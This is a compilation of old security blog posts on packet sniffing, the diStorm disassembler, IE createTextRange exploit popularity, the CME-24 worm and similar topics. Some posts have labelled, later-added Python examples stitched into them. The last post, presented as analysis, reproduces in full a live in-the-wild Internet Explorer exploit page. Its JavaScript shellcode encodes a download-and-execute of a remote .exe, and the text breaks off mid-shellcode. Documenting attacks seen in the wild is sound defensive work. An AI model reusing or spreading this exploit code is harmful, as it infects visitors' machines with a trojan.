Packet Sniffing

Q:

We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]

- Rob

A:

The easiest way to encrypt data between you and the server is to use SSL or SSH. If you are connecting to a web server, enable SSL encryption; if you are connecting to a service that can be protected by SSL, enable it.

If you can’t use SSL encryption in your product, you can use OpenSSH to tunnel traffic to the destination host, or use OpenVPN (SSL based) to encrypt the connection between you and the destination host.
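One practical check after moving a service behind SSL or SSH is to look at what a sniffer on the same segment would actually see. The following Python is an added example and not part of the original answer: the TCP payloads it inspects are constructed stand-ins for the application data of captured segments (the ports, the hostname and the user:secret Basic credential are made up), and a real run would feed in payloads pulled from a capture.

```python
"""Audit captured TCP payloads for cleartext logins.

Added example (not from the original answer): after moving a service behind
SSL/SSH, the practical check is to look at what a sniffer on the same segment
would actually see. The payloads below are constructed stand-ins for the
application data of captured TCP segments.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Cleartext login exchanges a sniffer can read directly. Order matters:
# the first matching pattern names the finding.
CLEARTEXT_PATTERNS = [
    ("http-basic-auth", re.compile(rb"^Authorization:\s*Basic\s+[A-Za-z0-9+/=]+", re.M | re.I)),
    ("pass-command", re.compile(rb"^PASS\s+\S+", re.M | re.I)),  # FTP / POP3
    ("user-command", re.compile(rb"^USER\s+\S+", re.M | re.I)),  # FTP / POP3
]


@dataclass
class Finding:
    port: int
    protocol: str
    status: str  # "cleartext-credential", "encrypted" or "clear"


def is_tls_record(payload: bytes) -> bool:
    """A TLS record starts with content type 0x16 (handshake) and a 0x03,0x0N version."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x04


def classify(port: int, payload: bytes) -> Finding:
    """Label one segment's payload; an encrypted session cannot match the text patterns."""
    if is_tls_record(payload):
        return Finding(port, "tls", "encrypted")
    for name, pattern in CLEARTEXT_PATTERNS:
        if pattern.search(payload):
            return Finding(port, name, "cleartext-credential")
    return Finding(port, "unknown", "clear")


def audit(payloads: List[Tuple[int, bytes]]) -> List[Finding]:
    return [classify(port, data) for port, data in payloads]


def leaking_ports(findings: List[Finding]) -> List[int]:
    """Destination ports on which credentials were readable on the wire."""
    return sorted({f.port for f in findings if f.status == "cleartext-credential"})


# Constructed sample segments (destination port, payload); no real traffic.
SAMPLE_SEGMENTS = [
    (80, b"GET /admin HTTP/1.1\r\nHost: www.example.test\r\n"
         b"Authorization: Basic dXNlcjpzZWNyZXQ=\r\n\r\n"),            # user:secret, readable
    (21, b"USER anonymous\r\nPASS guest@\r\n"),                          # FTP login, readable
    (443, bytes([0x16, 0x03, 0x01, 0x00, 0x2C, 0x01, 0x00, 0x00, 0x28, 0x03, 0x03]) + b"\x00" * 40),  # TLS ClientHello start
    (80, b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"),  # no credential
]

if __name__ == "__main__":
    findings = audit(SAMPLE_SEGMENTS)
    for f in findings:
        print(f"port {f.port:>4}: {f.status:22} ({f.protocol})")
    print("ports leaking credentials:", leaking_ports(findings))
```

Anything reported as cleartext-credential is a service that still needs to move behind SSL or a tunnel; once the port carries a TLS handshake, the text patterns have nothing left to match.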

The NULL Terminated Strip #2 (comic strip)

The NULL Terminated Strip, second strip of this new comic.

The NULL Terminated Strip #2

Hacked #5 (comic strip)

Hacked, fifth strip of this new comic.

Hacked #5

diStorm – very quick (open source) stream disassembler

distorm is just another stream disassembler, but… the quickest one i have ever seen and it supports amd64. the guy (arkon, gil dabah) must have no life as this thing is very good and must have taken quite some time to develop. it is open source.

it’s available for windows, linux and general *nix. there is also a pe binary parsing library in the package.

distorm64 is an amd64 disassembler, which is the first open source disassembler library for amd64 out there, licensed under the bsd license.

distorm is a binary stream disassembler. it’s capable of disassembling 80x86 instructions in 64 bits (amd64, x86-64) and in both 16 and 32 bits. in addition, it disassembles fpu, mmx, sse, sse2, sse3 and 3dnow! (w/ extensions) and the new x86-64 instruction sets. distorm was written to decode every instruction quickly and as accurately as possible. robust decoding, while taking special care for valid or unused prefixes, is what makes this disassembler powerful, especially for research. another benefit that might come in handy is that the module was written as multi-threaded, which means you could disassemble several streams simultaneously.
for rapid use, distorm is compiled for python and is easily used in c as well. distorm was originally written under windows and ported later to linux.
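to make the "valid or unused prefixes" point concrete, here is an added python example of the prefix stage of an x86/x86-64 stream decoder. it is not distorm's code and the byte strings fed to it are constructed, but the rules it applies are the architecture's own: one prefix per group takes effect, cs/ss/ds/es overrides are ignored in 64-bit mode, rex bytes (0x40-0x4f) are prefixes only in 64-bit mode and only directly before the opcode, and an instruction may not exceed 15 bytes.

```python
"""Prefix handling for an x86 / x86-64 stream decoder.

Added example, not diStorm's code: it illustrates why a robust decoder must
accept legal prefix runs, note redundant or ineffective ones, and know that
the REX bytes 0x40-0x4F are ordinary inc/dec opcodes outside 64-bit mode.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# byte -> (name, prefix group). Only one prefix per group has an effect.
LEGACY_PREFIXES = {
    0xF0: ("lock", 1), 0xF2: ("repne", 1), 0xF3: ("rep", 1),
    0x2E: ("cs", 2), 0x36: ("ss", 2), 0x3E: ("ds", 2), 0x26: ("es", 2),
    0x64: ("fs", 2), 0x65: ("gs", 2),
    0x66: ("opsize", 3), 0x67: ("addrsize", 4),
}
MAX_INSN_LEN = 15                                 # the CPU raises #UD beyond this
IGNORED_SEGMENTS_64 = {"cs", "ss", "ds", "es"}    # no effect in 64-bit mode


@dataclass
class PrefixInfo:
    prefixes: List[str] = field(default_factory=list)
    rex: Optional[int] = None
    opcode_offset: int = 0
    warnings: List[str] = field(default_factory=list)


def rex_fields(rex: int) -> Dict[str, int]:
    """Split a REX byte 0100WRXB into its four flag bits."""
    return {"W": (rex >> 3) & 1, "R": (rex >> 2) & 1, "X": (rex >> 1) & 1, "B": rex & 1}


def parse_prefixes(code: bytes, bits: int) -> PrefixInfo:
    """Consume the prefix bytes of one instruction; bits is the decoding mode (16, 32 or 64)."""
    if bits not in (16, 32, 64):
        raise ValueError("bits must be 16, 32 or 64")
    info = PrefixInfo()
    active: Dict[int, str] = {}  # group -> prefix currently in effect
    i = 0
    while i < len(code):
        b = code[i]
        if b in LEGACY_PREFIXES:
            name, group = LEGACY_PREFIXES[b]
            if group in active:
                info.warnings.append(f"redundant {name}: {active[group]} already set in its group")
            active[group] = name
            info.prefixes.append(name)
            if bits == 64 and name in IGNORED_SEGMENTS_64:
                info.warnings.append(f"{name} override has no effect in 64-bit mode")
            if info.rex is not None:
                # REX must directly precede the opcode; a legacy prefix after it cancels it
                info.warnings.append("REX not immediately before the opcode is ignored")
                info.rex = None
        elif bits == 64 and 0x40 <= b <= 0x4F:
            if info.rex is not None:
                info.warnings.append("second REX byte: earlier REX is ignored")
            info.rex = b
        else:
            break  # first opcode (or 0x0F escape) byte
        i += 1
    info.opcode_offset = i
    if i >= MAX_INSN_LEN:
        info.warnings.append("prefix run reaches the 15-byte instruction limit (#UD)")
    elif i == len(code):
        info.warnings.append("stream ends before an opcode byte")
    return info


if __name__ == "__main__":
    # constructed byte strings: rep movsq, a misplaced REX, and dec eax in 32-bit mode
    for hexcode, bits in (("f348a5", 64), ("48f3a5", 64), ("48", 32)):
        r = parse_prefixes(bytes.fromhex(hexcode), bits)
        print(hexcode, bits, r.prefixes, r.rex and rex_fields(r.rex), r.opcode_offset, r.warnings)
```

The same byte 0x48 is a REX.W prefix in 64-bit mode and the dec eax opcode in 32-bit mode, which is why the decoding mode has to be an input rather than something inferred from the stream.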

http://www.ragestorm.net/distorm/

a similar disassembler was recently released by piotr bania, called disit. also very good but my personal preference is distorm. disit is also still in beta.

gadi evron,
ge@beyondsecurity.com.

Counters say MSIE 0-day exploit is extremely popular [UPDATED]

The exploit code for the well known Microsoft Internet Explorer createTextRange DoS Vulnerability is remarkably popular. This is shown by a counter on the Milw0rm.com site, visible in its Remote type codes view.

At the time of writing the counter lists almost 13 000 visits. The Windows Metafile exploit code has about 9700 readers, and it was released more than two months ago. The number crossed 10 000 early on Monday. The code appeared on the site late on Thursday. Both exploits have the same author, ‘darkeagle’.

Microsoft really has several reasons to patch outside of their monthly cycle with more than 200 malicious sites exploiting this flaw.

Before you drop a comment, Google has only seven links to this exploit code page. ;-)
Update: 29th March, 14:25 UTC: this code listing has 14 000 hits.
Update #2: 30th March: the newer Metasploit exploit release has about 2530 hits.
Update, 7th April, 19:00 UTC: the counter says 18600 now. The Metasploit exploit has 8600 hits and the Download Shellcoded Exploit released later has 4200 hits.

Two Unofficial createTextRange() IE Patches

one from determina and another from eeye.

16 days to the microsoft patch.

go ilfak, you started a trend. not only does the security community do microsoft’s qa, now we also do their product updates. :)

gadi evron,
ge@beyondsecurity.com.

Code Red: Opera Cannot Handle Insufficient Disk Space and the SecuriTeam vs. Sendmail armed conflict

You gotta love those hilarious security advisories:

Opera > 8.02 with torrent support can’t handle not enough space on drive

If your partition is full and u choose to save a torrent on this
partition opera will start using 100% of your cpu and momery and
eventually crash

Tested with opera 9 p 2

Our feel on this is that if you’re out of disk space, the least of your problems is Opera utilizing 100% of your CPU!

By the way, while we’re on the subject of making a fool of yourself, we did our share of the ‘sky is falling’ bit, too. But we’re professionals (well, we’ve had practice), so at least we did it with some style: we followed up with Ido’s non-existent Sendmail memory leak, which got Eric Allman all worked up, and ended it with a pointy cartoon. Yeah! Finally a good fight. Hope it’ll last at least a month.

A final word to Ido: you’re new in the industry, aren’t you? Here, we don’t apologize for mistakes. We bury them in flamewars!

Product Evaluation: 10 things you need to know when testing the bleeding edge of the information security

HexView has written up a short article on the process of doing product evaluations:

This article is intended to fill the gaps often overlooked by people when architecting security infrastructures. The list below is squeezed out of our experience in testing technology products.

Even though the article is not very long, it does stress the 10 most important things, as well as the most common pitfalls.

The tip I like most is: Question every claim they make. Put simply, if a vendor claims his product uses 256 bytes for encryption, don’t believe it, verify it. Most vendors will exaggerate, not because their technical guys are stupid, but because their sales force and marketing team multiply everything by 2/5/10/20/etc :)

CME 24

Q:

Hope you can help with this question.

If a computer is infected with CME 24 will it attempt to attack a mapped network drive?
Not just delivering its payload.

Thanks

A:

Hi,

Let’s first try to understand what CME 24 is. CME (Common Malware Enumeration) is a relatively new standard for the way malware is identified and sorted.

CME allows different vendors, such as: Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, TrojanDownloader, Norman, Panda, Sophos, Symantec, and Trend Micro to name the malware they identify in such a way that the user can know that the Malware ‘X’ that company A has found is the same Malware named ‘Y’ that company B finds.

CME 24 is also named by the different vendors as:
Aladdin Knowledge Systems: Win32.Blackmal.e
Authentium: W32/Kapser.A@mm
AVIRA: Worm/KillAV.GR
CA: Win32/Blackmal.F
ESET: Win32/VB.NEI
Fortinet: W32/Grew.A!wm
F-Secure: Nyxem.E
Grisoft: Worm/Generic.FX
H+BEDV: Worm/KillAV.GR
Kaspersky: Email-Worm.Win32.Nyxem.e
McAfee: W32/MyWife.d@MM
Microsoft: Win32/Mywife.E@mm!CME-24
Norman: W32/Small.KI
Panda: W32/Tearec.A.worm
Sophos: W32/Nyxem-D
Symantec: W32.Blackmal.E@mm
TrendMicro: WORM_GREW.A

Its payload: destroy certain data files on an infected user’s machine on Friday, February 3, 2006.

According to our sources and independent analysis conducted on this worm, the code should have destroyed content on mapped drives. However, it is apparent that in the wild (ITW) the worm’s payload does not function correctly, making it unable to destroy content found on mapped drives.

Internet Explorer createTextRange() 0day ITW Exploit

in the past week an internet explorer 0day vulnerability has been exploited in the wild, openly against users. most of the exploiting sites run shellcode which downloads a trojan horse to the exploited machine. the trojan horse downloaded varies from site to site.

according to a chat i just had with dan hubbard from websense, more than 200 web sites hosted this code exploiting users so far. secunia issued an advisory on it.

below is an example source from one of the web pages holding the exploit code. we strongly suggest you don’t run it.

<!doctype html public “-//w3c//dtd html 4.0 transitional//en”>
<html xmlns=”http://www.w3.org/tr/rec-html40″ xmlns:o =
“urn:schemas-microsoft-com:office:office” xmlns:w =
“urn:schemas-microsoft-com:office:word” xmlns:v =
“urn:schemas-microsoft-com:vml”><head>
<meta http-equiv=content-type content=”text/html; charset=windows-1252″>
<meta content=frontpage.editor.document name=progid>
<meta content=”mshtml 6.00.2800.1226″ name=generator>
<meta content=”microsoft word 10″ name=originator><link
xhref=”introduction_files/filelist.xml” mce_href=”introduction_files/filelist.xml” rel=file-list><!–[if gte mso 9]><xml>
<o:documentproperties>
<o:author>denis le marchant-smith</o:author>
<o:template>normal</o:template>
<o:lastauthor>denis le marchant-smith</o:lastauthor>
<o:revision>2</o:revision>
<o:totaltime>1</o:totaltime>
<o:created>2003-04-19t12:24:00z</o:created>
<o:lastsaved>2003-04-19t12:24:00z</o:lastsaved>
<o:pages>1</o:pages>
<o:company>evr</o:company>
<o:lines>1</o:lines>
<o:paragraphs>1</o:paragraphs>
<o:version>10.2625</o:version>
</o:documentproperties>
</xml><![endif]–><!–[if gte mso 9]><xml>
<w:worddocument>
<w:compatibility>
<w:breakwrappedtables/>
<w:snaptogridincell/>
<w:wraptextwithpunct/>
<w:useasianbreakrules/>
</w:compatibility>
<w:browserlevel>microsoftinternetexplorer4</w:browserlevel>
</w:worddocument>
</xml><![endif]–>
<style>@page section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in 1.25in; mso-header-margin: .5in; mso-footer-margin: .5in; mso-paper-source: 0; }
p.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
li.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.section1 {
page: section1
}
</style>
<!–[if gte mso 10]>
<style>
/* style definitions */
table.msonormaltable
{mso-style-name:”table normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:”";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”times new roman”}
</style>
<![endif]–><!–[if !mso]>
<style>v\:* {
behavior: url(#default#vml)
}
o\:* {
behavior: url(#default#vml)
}
w\:* {
behavior: url(#default#vml)
}
.shape {
behavior: url(#default#vml)
}
</style>
<![endif]–><!–[if gte mso 9]>
<xml><o:shapedefaults v:ext=”edit” spidmax=”1027″/>
</xml><![endif]–></head>
<body lang=en-us style=”tab-interval: .5in” bgcolor=#000000 background=”background.gif”>
<div id=dot0
style=”visibility: hidden; width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”" mce_src=”" width=11> </div>
<div id=dot1 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot2 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot3 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot4 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot5 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot6 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<script language=javascript>
<!– hide code

/*
elastic trail script (by philip winston @ pwinston@yahoo.com, url: http://www.geocities.com/pwinston/)
script featured on dynamicdrive.com
for this and 100′s more dhtml scripts, visit http://dynamicdrive.com
*/

var ndots = 7;

var xpos = 0;
var ypos = 0;

// fixed time step, no relation to real time
var deltat = .01;
// size of one spring in pixels
var seglen = 10;
// spring constant, stiffness of springs
var springk = 10;
// all the physics is bogus, just picked stuff to
// make it look okay
var mass = 1;
// positive xgravity pulls right, negative pulls left
// positive ygravity pulls down, negative up
var xgravity = 0;
var ygravity = 50;
// resistance determines a slowing force proportional to velocity
var resistance = 10;
// stopping criterea to prevent endless jittering
// doesn’t work when sitting on bottom since floor
// doesn’t push back so acceleration always as big
// as gravity
var stopvel = 0.1;
var stopacc = 0.1;
var dotsize = 11;
// bounce is percent of velocity retained when
// bouncing off a wall
var bounce = 0.75;

var isnetscape = navigator.appname==”netscape”;

// always on for now, could be played with to
// let dots fall to botton, get thrown, etc.
var followmouse = true;

var dots = new array();
init();

function init()
{
var i = 0;
for (i = 0; i < ndots; i++) {
dots[i] = new dot(i);
}

if (!isnetscape) {
// i only know how to read the locations of the
// <li> items in ie
//skip this for now
// setinitpositions(dots)
}

// set their positions
for (i = 0; i < ndots; i++) {
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}

if (isnetscape) {
// start right away since they are positioned
// at 0, 0
startanimate();
} else {
// let dots sit there for a few seconds
// since they’re hiding on the real bullets
settimeout(“startanimate()”, 1000);
}
}

function dot(i)
{
this.x = xpos;
this.y = ypos;
this.dx = 0;
this.dy = 0;
if (isnetscape) {
this.obj = eval(“document.dot” + i);
} else {
this.obj = eval(“dot” + i + “.style”);
}
}

function startanimate() {
setinterval(“animate()”, 20);
}

// this is to line up the bullets with actual li tags on the page
// had to add -dotsize to x and 2*dotsize to y for ie 5, not sure why
// still doesn’t work great
function setinitpositions(dots)
{
// initialize dot positions to be on top
// of the bullets in the <ul>
var startloc = document.all.tags(“li”);
var i = 0;
for (i = 0; i < startloc.length && i < (ndots – 1); i++) {
dots[i+1].x = startloc[i].offsetleft
startloc[i].offsetparent.offsetleft – dotsize;
dots[i+1].y = startloc[i].offsettop +
startloc[i].offsetparent.offsettop + 2*dotsize;
}
// put 0th dot above 1st (it is hidden)
dots[0].x = dots[1].x;
dots[0].y = dots[1].y – seglen;
}

// just save mouse position for animate() to use
function movehandler(e)
{
xpos = e.pagex;
ypos = e.pagey;
return true;
}

// just save mouse position for animate() to use
function movehandlerie() {
xpos = window.event.x + document.body.scrollleft;
ypos = window.event.y + document.body.scrolltop;
}

if (isnetscape) {
document.captureevents(event.mousemove);
document. = movehandler;
} else {
document. = movehandlerie;
}

function vec(x, y)
{
this.x = x;
this.y = y;
}

// adds force in x and y to spring for dot[i] on dot[j]
function springforce(i, j, spring)
{
var dx = (dots[i].x – dots[j].x);
var dy = (dots[i].y – dots[j].y);
var len = math.sqrt(dx*dx + dy*dy);
if (len > seglen) {
var springf = springk * (len – seglen);
spring.x += (dx / len) * springf;
spring.y += (dy / len) * springf;
}
}

function animate() {
// dots[0] follows the mouse,
// though no dot is drawn there
var start = 0;
if (followmouse) {
dots[0].x = xpos;
dots[0].y = ypos;
start = 1;
}

for (i = start ; i < ndots; i++ ) {

var spring = new vec(0, 0);
if (i > 0) {
springforce(i-1, i, spring);
}
if (i < (ndots – 1)) {
springforce(i+1, i, spring);
}

// air resisitance/friction
var resist = new vec(-dots[i].dx * resistance,
-dots[i].dy * resistance);

// compute new accel, including gravity
var accel = new vec((spring.x + resist.x)/mass + xgravity,
(spring.y + resist.y)/ mass + ygravity);

// compute new velocity
dots[i].dx += (deltat * accel.x);
dots[i].dy += (deltat * accel.y);

// stop dead so it doesn’t jitter when nearly still
if (math.abs(dots[i].dx) < stopvel &&
math.abs(dots[i].dy) < stopvel &&
math.abs(accel.x) < stopacc &&
math.abs(accel.y) < stopacc) {
dots[i].dx = 0;
dots[i].dy = 0;
}

// move to new position
dots[i].x += dots[i].dx;
dots[i].y += dots[i].dy;

// get size of window
var height, width;
if (isnetscape) {
height = window.innerheight + window.pageyoffset;
width = window.innerwidth + window.pagexoffset;
} else {
height = document.body.clientheight + document.body.scrolltop;
width = document.body.clientwidth + document.body.scrollleft;
}

// bounce off 3 walls (leave ceiling open)
if (dots[i].y >= height – dotsize – 1) {
if (dots[i].dy > 0) {
dots[i].dy = bounce * -dots[i].dy;
}
dots[i].y = height – dotsize – 1;
}
if (dots[i].x >= width – dotsize) {
if (dots[i].dx > 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = width – dotsize – 1;
}
if (dots[i].x < 0) {
if (dots[i].dx < 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = 0;
}

// move img to new position
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}
}

// end code hiding –>
</script>

<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center><font face=fifthave><!–[if gte vml 1]><v:shapetype
id=_x0000_t170 coordsize = “21600,21600″ o:spt = “170″ path =
” m@0,0 l@1,0 m0,21600 l21600,21600 e” adj = “7200″><v:formulas><v:f eqn =
“sum #0 0 0 “></v:f><v:f eqn = “sum 21600 0 @0 “></v:f><v:f eqn =
“prod #0 1 2 “></v:f><v:f eqn = “sum 21600 0 @2 “></v:f><v:f eqn =
“sum @1 21600 @0 “></v:f></v:formulas><v:path o:connectangles=”270,180,90,0″
o:connectlocs=”10800,0;@2,10800;10800,21600;@3,10800″ textpathok = “t”
o:connecttype = “custom”></v:path><v:textpath on = “t” fitshape =
“t”></v:textpath><v:handles><v:h xrange=”0,10792″
position=”#0,topleft”></v:h></v:handles><o:lock shapetype=”t” text=”t”
v:ext=”edit”></o:lock></v:shapetype><v:shape id=_x0000_s1028
style=”width: 300.75pt; height: 120.75pt” type = “#_x0000_t170″ coordsize =
“21600,21600″ alt = “rock drumming” fillcolor = “blue” strokecolor =
“red” strokeweight = “12668emu” adj = “2158″><v:shadow on = “t” type =
“perspective” color = “#875b0d” opacity = “45875f” matrix =
“,,,.5,0,-476837158203125e-21″ origin = “,.5″></v:shadow><v:textpath
style=”font-family: ‘arial black’; v-text-kern: t” fitpath = “t” trim = “t”
string = “rock drumming”></v:textpath></v:shape><![endif]–><![if !vml]><img border=0 width=397 height=165
xsrc=”introduction_files/image001.gif” mce_src=”introduction_files/image001.gif” alt=”rock drumming” v:shapes=”_x0000_s1028″><![endif]></font></p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=left>‚†</p>
<p align=left><font color=#ffffff size=6>hi, my name is alex, and i have been
playing the drums since i was four years old and i have made this website to
show you types and tips on rock drumming. so in this website you will find a lot
of things you need to know to become a rock drummer. so now you can
explore my out of this world site. you can go to different parts of my website
by clicking on the words below.</font></p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center><img height=379 xsrc=”indexfiles/duhh.gif” mce_src=”indexfiles/duhh.gif” width=278
border=0></p>
<p align=center>‚†</p>
<p align=center>‚†</p>
<p align=center><a
xhref=”tips.htm” mce_href=”tips.htm”><font
face=catchup color=#00ff00 size=7>tips</font></a></p>
<p align=center>‚†</p>
<p align=center><a
xhref=”tricks.htm” mce_href=”tricks.htm”><font
face=”copperplate gothic bold” color=#00ff00 size=7>types of
drums</font></a></p>
<p align=center>‚†</p>
<p align=center>
<font size=7><a
xhref=”drumsets.htm” mce_href=”drumsets.htm”><font
color=#00ff00>drum sets</font></a></font></font></p>
<p align=center>‚†</p>
<input type=”checkbox” id=”blah”>
<script language=”javascript”>

shellcode = unescape( “%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 
%u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u6300%u6c61%u2e63%u7865%u0065%u6f4d%u697a %u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170 %u6974%u6c62%u3b65%u4d20%u4953%u2045%u2e35
%u3130%u203b%6957%u646e%u776f%u2073%u544e %u3520%u302e%u0029%u6977%u696e%u656e%u2e74 %u6c64%u006c%u0000%u0000%u0000%u0000%u0000 %u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u0041%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u7255%u416c%u4900%u746e%u7265 %u656e%u5274%u6165%u4664%u6c69%u0065%u6e49 %u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61 %u6c64%u0065%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u7468%u7074%u2f3a%u772f%u7777 %u662e%u6c75%u666c%u7461%u6b73%u6e69%u796e %u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u6058%ud08b%u33fc%u64c0%u408b %u8b30%u0c40%u708b%uad1c%u688b%u5208%u5252 %u5252%u5252%u5252%u5252%u5252%u79bb%ue741 %u5288%u0068%u0002%ue800%u0191%u0000%u8b5f %u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000 %ua4f2%ubb5a%u7959%u4773%u006a%u8068%u0000 %u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852 %u0161%u0000%ue85a%u014b%u0000%u4289%u8304 %u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00 %uc21b%u3b10%ue85a%u012f%u0000%u0289%uc283 %u5210%ue850%u0133%u0000%u815a%ue8c2%u0003 